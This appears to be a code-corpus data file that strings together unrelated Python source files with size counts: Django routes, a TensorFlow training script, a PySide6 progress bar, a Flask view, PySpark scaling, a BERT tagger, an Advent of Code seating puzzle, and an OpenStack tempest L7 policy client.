path('product/create', views.productCreate, name='product-create'),
path('product/update/<str:pk>', views.productUpdate, name='product-update'),
path('product/delete/<str:pk>', views.productDelete, name='product-delete'),
] | 507 | 153 |
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
path = 'Models/gpu2/'
# path = 'Models/'
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
# tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
warmup = 3
warmup_lr = 1e-5 # 0.00001
threshold = 15
lr = 1e-4 # 0.0001
lr2 = 5e-5 # 0.00005
if epoch < warmup:
return warmup_lr
elif epoch == warmup:
return (lr + warmup_lr) / 2
elif epoch < threshold:
return lr
else:
return lr2
callback = [
ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
LearningRateScheduler(scheduler, verbose=1),
# TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
| 1,512 | 595 |
from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
class CustomPb(QWidget):
def __init__(
self,
value = 0,
progress_width = 2,
# progress_length= 500,
is_rounded = False,
max_value = 100,
progress_color = "#ff79c6",
enable_text = True,
font_family = "Segoe UI",
font_size = 12,
suffix = "%",
text_color = "#ff79c6",
enable_bg = True,
bg_color = "#44475a"
):
QWidget.__init__(self)
# CUSTOM PROPERTIES
self.value = value
self.progress_width = progress_width
# self.progress_length = progress_length
self.progress_rounded_cap = is_rounded
self.max_value = max_value
self.progress_color = progress_color
# Text
self.enable_text = enable_text
self.font_family = font_family
self.font_size = font_size
self.suffix = suffix
self.text_color = text_color
# BG
self.enable_bg = enable_bg
self.bg_color = bg_color
# ADD DROPSHADOW
def add_shadow(self, enable):
if enable:
self.shadow = QGraphicsDropShadowEffect(self)
self.shadow.setBlurRadius(15)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 80))
self.setGraphicsEffect(self.shadow)
# SET VALUE
def setValue(self, value):
self.value = value
self.repaint() # Render progress bar after change value
# PAINT EVENT (DESIGN YOUR CIRCULAR PROGRESS HERE)
def paintEvent(self, e):
# SET PROGRESS PARAMETERS
width = self.width() - self.progress_width
height = self.height() - self.progress_width
margin = self.progress_width / 2
y=0.75*self.height()+margin
value = (self.value / self.max_value) * width
# length = self.progress_length
# PAINTER
paint = QPainter()
paint.begin(self)
paint.setRenderHint(QPainter.Antialiasing) # remove pixelated edges
paint.setFont(QFont(self.font_family, self.font_size))
# CREATE RECTANGLE for the text value
# rect = QRect(0, 0, self.width(), self.height())
rect = QRect(self.width()/4, self.height()/4, self.width()/2, self.height()/2)
paint.setPen(Qt.NoPen)
# PEN
pen = QPen()
pen.setWidth(self.progress_width)
# Set Round Cap
if self.progress_rounded_cap:
pen.setJoinStyle(Qt.RoundJoin)
else:
pen.setJoinStyle(Qt.MiterJoin)
# ENABLE BG
if self.enable_bg:
pen.setColor(QColor(self.bg_color))
paint.setPen(pen)
paint.drawRect(margin, y ,width ,self.progress_width )
# CREATE ARC / CIRCULAR PROGRESS
pen.setColor(QColor(self.progress_color))
paint.setPen(pen)
paint.drawRect(margin, y ,value ,self.progress_width )
# CREATE TEXT
if self.enable_text:
pen.setColor(QColor(self.text_color))
pen.setWidth(40)
font = QFont()
# print(font.pointSize())
font.setPointSize(12)
paint.setFont(font)
paint.setPen(pen)
paint.drawText(rect, Qt.AlignCenter, f"{self.value}{self.suffix}")
# END
paint.end() | 3,470 | 1,127 |
"""Cam Hudson Personal Website app's index.html view.
URLs handled in this file include:
/
"""
from flask import render_template, session
from camhudson.views.utility import create_index_card # Make linter shut up
import camhudson
@camhudson.app.route('/', methods=['GET'])
@camhudson.app.route('/index.html', methods=['GET'])
def get_index() -> str:
"""Handle request for homepage."""
context = {
'cards': [
create_index_card(
'Bio',
'Take a few moments to learn a little about Cam!',
'/bio',
'/static/images/cam.png',
'Cam Hudson selfie'
),
create_index_card(
'Résumé',
'Dive into Cam\'s skills, education, and work history!',
'/hudson-resume.pdf\" target=\"_blank',
'/static/images/joao-ferrao-resume.png',
'Resume on desk'
),
create_index_card(
'Contact',
'Find out how you can get in touch with Cam!',
'contact-info',
'/static/images/elizaveta-kushnirenko-mailbox.png',
'Mailbox',
)
]
}
return render_template('index.html', **context)
| 1,301 | 371 |
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import argparse
from pyspark.ml.feature import MinMaxScaler, StandardScaler, VectorAssembler
def extract(row):
return (row.id,) + tuple(row.scaledFeatures.toArray().tolist()[:-1])
def normalize_data(df, scaler_type, columns):
"""
Scale numeric features using two methods
1) minmax normalization or
2) standardization
Args:
df: input dataframe
scaler_type: either "minmax" or "standard"
columns: columns to be scaled/ normalized
Return:
Scaled dataframe
"""
columns = (
[col for col in df.columns if col not in {"id", "timestamp"}]
if not columns
else columns
)
not_normalized_columns = list(set(df.columns).difference(set(columns)))
df = df.withColumn("id", F.monotonically_increasing_id())
columns += ["id"]
not_normalized_columns += ["id"]
assembler = VectorAssembler().setInputCols(
columns).setOutputCol("features")
transformed = assembler.transform(df.select(columns))
if scaler_type == "minmax":
scaler = MinMaxScaler(inputCol="features", outputCol="scaledFeatures")
elif scaler_type == "standard":
scaler = StandardScaler(
inputCol="features",
outputCol="scaledFeatures")
else:
raise ValueError("Invalid scaler type")
scalerModel = scaler.fit(transformed.select("features"))
scaledData = scalerModel.transform(transformed)
scaledData = (
scaledData.select(["id", "scaledFeatures"])
.rdd.map(extract)
.toDF(["id"] + columns[:-1])
)
return df.select(not_normalized_columns).join(
scaledData,
on="id").drop("id")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input", required=True)
parser.add_argument("--output", required=True)
parser.add_argument("--norm", required=True)
parser.add_argument("--columns", nargs="+", required=True)
parser.add_argument("--coalesce", required=False, action="store_true")
args = parser.parse_args()
columns = args.columns[0].split(
" ") if len(args.columns) == 1 else args.columns
spark = SparkSession.builder.appName("DataFlow").getOrCreate()
input_data = spark.read.csv(
args.input,
sep=",",
inferSchema=True,
header=True)
input_data_scaled = normalize_data(input_data, args.norm, columns)
if args.coalesce:
input_data_scaled.coalesce(1).write.csv(args.output, header=True)
else:
input_data_scaled.write.csv(args.output, header=True)
| 2,661 | 827 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
import torch
import torch.nn as nn
from pytorch_pretrained_bert import BertModel
from deep_morphology.models.base import BaseModel
from deep_morphology.models.seq2seq import compute_sequence_loss
from deep_morphology.models.mlp import MLP
use_cuda = torch.cuda.is_available()
def to_cuda(var):
if use_cuda:
return var.cuda()
return var
class BERTTagger(BaseModel):
def __init__(self, config, dataset):
super().__init__(config)
self.dataset = dataset
self.output_size = len(dataset.vocabs.pos)
model_name = getattr(self.config, 'bert_model', 'bert-base-multilingual-cased')
self.bert = BertModel.from_pretrained(model_name)
self.bert_layer = self.config.bert_layer
bert_size = 768 if 'base' in model_name else 1024
n_layer = 12 if 'base' in model_name else 24
if self.bert_layer == 'weighted_sum':
self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
if hasattr(self.config, 'lstm_size'):
self.lstm = nn.LSTM(
bert_size, self.config.lstm_size, batch_first=True,
dropout=self.config.dropout,
num_layers=self.config.lstm_num_layers,
bidirectional=True)
hidden_size = self.config.lstm_size * 2
else:
self.lstm = None
hidden_size = bert_size
if self.bert_layer == 'weighted_sum':
self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
self.output_proj = nn.Linear(hidden_size, self.output_size)
self.output_proj = MLP(
input_size=bert_size,
layers=self.config.mlp_layers,
nonlinearity=self.config.mlp_nonlinearity,
output_size=self.output_size,
)
# ignore <pad> = 3
self.criterion = nn.CrossEntropyLoss(
ignore_index=self.dataset.vocabs.pos['<pad>'])
for param in self.bert.parameters():
param.requires_grad = False
def compute_loss(self, batch, output):
target = to_cuda(torch.LongTensor(batch.pos))
return compute_sequence_loss(target, output, self.criterion)
def forward(self, batch):
X = to_cuda(torch.LongTensor(batch.sentence))
mask = torch.arange(X.size(1)) < torch.LongTensor(batch.sentence_len).unsqueeze(1)
mask = to_cuda(mask.long())
bert_out, _ = self.bert(X, attention_mask=mask)
if self.bert_layer == 'mean':
bert_out = torch.stack(bert_out).mean(0)
elif self.bert_layer == 'weighted_sum':
bert_out = (
self.bert_weights[:, None, None, None] * torch.stack(bert_out)).sum(0)
else:
bert_out = bert_out[self.bert_layer]
if self.lstm:
bert_out = self.lstm(bert_out)[0]
return self.output_proj(bert_out)
| 3,051 | 1,051 |
class Auto:
marca = ""
modelo = 0
placa = ""
taxi = Auto()
print(taxi.modelo)
#se imprime el modelo únicamente | 123 | 47 |
#! /usr/bin/env python3
part = 1
def read_input():
with open('../inputs/input11.txt') as fp:
lines = fp.readlines()
return [line.strip() for line in lines]
class Seat:
def __init__(self, x, y, state):
self.x = x
self.y = y
self.state = state
def __str__(self):
return self.state
def isEdge(self):
return self.state in '_|'
def isFloor(self):
return self.state == '.'
def isEmptySeat(self):
return self.state == 'L'
def isFilledSeat(self):
return self.state == '#'
# @returns Seat[]
def neighbours(self):
global seating
neighbs = {
'W': seating[self.y][self.x - 1],
'E': seating[self.y][self.x + 1],
'S': seating[self.y + 1][self.x],
'N': seating[self.y - 1][self.x],
'NW': seating[self.y - 1][self.x - 1],
'SW': seating[self.y + 1][self.x - 1],
'NE': seating[self.y - 1][self.x + 1],
'SE': seating[self.y + 1][self.x + 1]
}
return list(neighbs.values())
# @returns Seat[]
def line_of_sight_seats(self):
dirs = {
'N': (-1,0),
'NE': (-1,1),
'E': (0,1),
'SE': (1,1),
'S': (1,0),
'SW': (1,-1),
'W': (0,-1),
'NW': (-1,-1)
}
# look for first filled, empty or edge seat in a direction
def look_at_seat(direction):
pos = (self.y, self.x)
# do not take more than d steps from original pos
while 1:
pos = (pos[0] + direction[0], pos[1] + direction[1])
seat = seating[pos[0]][pos[1]]
if not seat.isFloor():
return seat
return [look_at_seat(direction) for direction in list(dirs.values())]
def get_new_state(self):
# skip floors and edges
if self.isEdge() or self.isFloor():
return self.state
if part == 1:
tolerance = 4
filled_neighbours = [nb for nb in self.neighbours() if nb.isFilledSeat()]
else:
tolerance = 5
filled_neighbours = [nb for nb in self.line_of_sight_seats() if nb.isFilledSeat()]
# node empty and no filled neighbs -> filled
if self.isEmptySeat() and len(filled_neighbours) == 0:
return '#'
# node filled and 4+ filled neighbs -> empty
elif self.isFilledSeat() and len(filled_neighbours) >= tolerance:
return 'L'
return self.state
# generate string snapshot of current seating area, for state comparison
# @returns {String}
def hash_seating(seating):
return "".join(["".join([str(seat) for seat in row]) for row in seating])
# pad grid with | and _ to avoid out-of-bounds errors:
# @param {string[]} grid
def pad_grid(grid):
pgrid = []
# sides
for y in range(len(grid)):
pgrid += ["|" + grid[y] + "|"]
# top, bottom
horiz = "_" * len(pgrid[0])
return [horiz] + pgrid + [horiz]
diagram = pad_grid(read_input())
# set up two 2D arrays, for current and next state
seating = []
next_seating = []
# fill initial seating
for y, line in enumerate(diagram):
seating += [[]]
for x, char in enumerate(line):
seating[y] += [Seat(x, y, char)]
# one iteration of time
def run_step(i):
global seating, next_seating
# new empty seating before filling from current
next_seating = []
# fill next_seating
for y, row in enumerate(seating):
next_seating += [[]]
for x, seat in enumerate(row):
next_seating[y] += [Seat(seat.x, seat.y, seat.get_new_state())]
# run time and keep comparing hashes to detect stable state
i = 0
while 1:
i += 1
run_step(i)
# progress...
if i % 20 == 0:
print(i, hash_seating(next_seating))
if hash_seating(seating) == hash_seating(next_seating):
# part 1 - number of full seats, once stable - 2183
# part 2 - same - 1990
print(hash_seating(seating).count("#"), "full seats")
break
else:
# shift seating states before next loop
seating, next_seating = next_seating, []
| 4,246 | 1,464 |
# coding=utf-8
u"""F5 Networks® LBaaSv2 L7 rules client for tempest tests."""
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from six.moves.urllib import parse
from tempest.lib.common import rest_client
class L7PolicyClientJSON(rest_client.RestClient):
"""Tests L7 Policies API."""
def list_l7policies(self, params=None):
"""List all L7 policies."""
url = 'v2.0/lbaas/l7policies.json'
if params:
url = "{0}?{1}".format(url, parse.urlencode(params))
resp, body = self.get(url)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBodyList(resp, body['l7policies'])
def get_l7policy(self, policy_id, params=None):
"""Get L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
if params:
url = '{0}?{1}'.format(url, parse.urlencode(params))
resp, body = self.get(url)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def create_l7policy(self, **kwargs):
"""Create L7 policy."""
url = 'v2.0/lbaas/l7policies.json'
post_body = jsonutils.dumps({"l7policy": kwargs})
resp, body = self.post(url, post_body)
body = jsonutils.loads(body)
self.expected_success(201, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def update_l7policy(self, policy_id, **kwargs):
"""Update L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
put_body = jsonutils.dumps({"l7policy": kwargs})
resp, body = self.put(url, put_body)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def delete_l7policy(self, policy_id):
"""Delete L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
resp, body = self.delete(url)
self.expected_success(204, resp.status)
| 2,667 | 899 |